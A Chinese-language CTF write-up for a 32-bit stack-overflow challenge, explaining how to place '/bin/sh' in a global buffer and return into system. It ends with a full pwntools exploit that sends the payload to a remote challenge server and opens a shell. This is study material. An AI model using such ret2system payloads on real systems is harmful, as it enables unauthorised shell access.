file,checksec:
main 函数:
hello 函数:
name 中可以保存字符串,因此我们在 name 中输入 /bin/sh,那么我们就可以利用变量 name 的内存地址,得到 system('/bin/sh'),从而得到shell。
pwn 函数(存在system):
溢出大小为:0x26+4
我本来在ROPgadget中找到了 sh 字符串,但是一直无法成功得到shell,之后查看才得知,这个sh并不是单纯的 sh。草率了。但是不知道为什么 ciscn_2019_ne_5 可以跑通。求师傅指教。
payload加入main函数,原因:32位和64位的结构不同,32位调用一个函数需要返回地址,之后再调用其他的进行传参,而且32位是用栈传递参数的,而64为使用比如rdi,rsi等寄存器进行传参,因此需要插入一个 main 函数作为返回地址。
利用exp:
from pwn import *
#start
r = remote('61.147.171.35',63069)
context.log_level = 'debug'
elf = ELF('./pwn')
#params
#system_addr = 0x8048420
system_addr = elf.sym['system']
main_addr = elf.sym['main']
name_addr = elf.sym['name']
#attack
payload = b'a'*(0x26+4) + p32(system_addr) + p32(main_addr) + p32(name_addr)
r.sendlineafter(b'name',b'/bin/sh')
r.sendline(payload)
r.interactive()